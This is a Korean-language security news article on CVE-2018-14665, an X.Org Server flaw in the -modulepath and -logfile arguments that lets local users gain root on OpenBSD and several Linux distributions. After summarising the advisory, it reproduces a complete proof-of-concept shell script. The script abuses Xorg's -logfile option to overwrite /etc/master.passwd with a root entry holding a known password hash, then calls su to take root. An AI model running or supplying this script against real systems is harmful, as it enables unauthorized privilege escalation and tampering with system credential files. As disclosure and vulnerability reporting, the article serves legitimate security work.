
OpenBsd_CVE-2018-14665
인도 보안 연구원 Narendra Shinde는 X.Org Server 패키지에서 일반 계정으로 루트 권한을 얻을 수 있는 고위험 취약점(CVE-2018-14665)을 발견했습니다. 이 취약점은 OpenBSD, Debian, Ubuntu, CentOS, Red Hat, Fedora를 포함한 주요 리눅스 배포판에 영향을 미칩니다.
Xorg X 프로젝트는 X Window 시스템(즉, X11 또는 간단히 X)의 오픈 소스 구현을 제공합니다. 이는 비트맵 디스플레이를 위한 윈도우 시스템으로, GUI 환경의 기본 프레임워크를 제공합니다: 디스플레이 장치에 창을 그리고 이동시키고 마우스와 키보드로 상호 작용합니다.
Shinde는 Xorg X 서버가 적어도 다음 두 명령줄 인수의 인수를 올바르게 처리하고 검증하지 못한다는 것을 발견했습니다.
-modulepath: Xorg 서버 모듈을 검색할 디렉토리 경로를 설정합니다.-logfile: 대부분의 플랫폼에서 기본 로그인 /var/log/Xorg.n.log 대신 Xorg 서버의 새 로그 파일을 설정합니다.Narendra Shinde에 따르면, 권한이 낮은 사용자가 이를 악용하여 악성 코드를 실행하고 시스템의 모든 파일을 덮어쓸 수 있습니다.
이 취약점은 2년 전 X.Org 서버 1.19.0 패키지에 도입되었습니다.
Xorg는 CVE-2018-14665 취약점에 대한 보안 권고문을 발표했습니다.
"X 서버가 상승된 권한으로 실행될 때(즉, Xorg가 설치되고 setuid 비트가 설정되어 루트가 아닌 사용자에 의해 시작될 때)" Xorg 권고문에 따르면.
"-modulepath 인수는 X 서버에 로드될 모듈의 안전하지 않은 경로를 지정하는 데 사용될 수 있으며, 권한 있는 프로세스 내에서 권한 없는 코드를 실행할 수 있습니다.
옵션을 구문 분석할 때 검사가 올바르지 않기 때문에 -logfile 인수를 사용하여 파일 시스템에서 임의의 파일을 덮어쓸 수 있습니다."
보안 전문가 Matthew Hickey는 또한 개념 증명 익스플로잇 코드를 공개했습니다. 이를 통해 공격자는 3개 이하의 명령으로 취약한 시스템을 장악할 수 있습니다.
OpenBSD의 #0day LPE는 CVE-2018-14665를 통해 원격 SSH 세션에서 트리거될 수 있으며, 로컬 콘솔이 필요하지 않습니다. 공격자는 문자 그대로 3개 명령 이하로 취약한 시스템을 장악할 수 있습니다.
익스플로잇 스크립트: https://hacker.house/releasez/expl0itz/openbsd-0day-cve-2018-14665.sh

#!/bin/sh
# local privilege escalation in X11 currently
# unpatched in OpenBSD 6.4 stable - exploit
# uses cve-2018-14665 to overwrite files as root.
# Impacts Xorg 1.19.0 - 1.20.2 which ships setuid
# and vulnerable in default OpenBSD. Errata: was
# unpatched 0day for a day on release by Xorg for
# OpenBSD systems - patched 26-10-2018.
#
# Credit for cve-2018-14665 goes to Narendra Shinde.
# Theo explains why this flaw made it into OpenBSD
# stable releases (tested 6.3 & 6.4) as 0day himself
# here:
#
# https://marc.info/?l=openbsd-tech&r=1&b=201810&w=2
#
# "That is the first localhost root hole in quite a
# long time." - Theo de Raadt 25/10/18
#
# This exploit works on OpenBSD 6.3 and 6.4, ymmv.
# requires the ability to run "su" and a local
# account. Run this exploit once and it will backup
# the original passwd file to /etc/master.passwd.old
#
# - https://hacker.house
echo [+] OpenBSD 6.4-stable local root exploit
cd /etc
Xorg -fp 'root:$2b$08$As7rA9IO2lsfSyb7OkESWueQFzgbDfCXw0JXjjYszKa8Aklt5RTSG:0:0:daemon:0:0:Charlie &:/root:/bin/ksh' -logfile master.passwd :1 &
sleep 5
pkill Xorg
echo [-] dont forget to mv and chmod /etc/master.passwd.old back
echo [+] type 'Password1' and hit enter for root
su -
https://twitter.com/hackerfantastic
https://securityaffairs.co/wordpress/77402/hacking/cve-2018-14665-linux-distros.html
https://hacker.house/releasez/expl0itz/openbsd-0day-cve-2018-14665.sh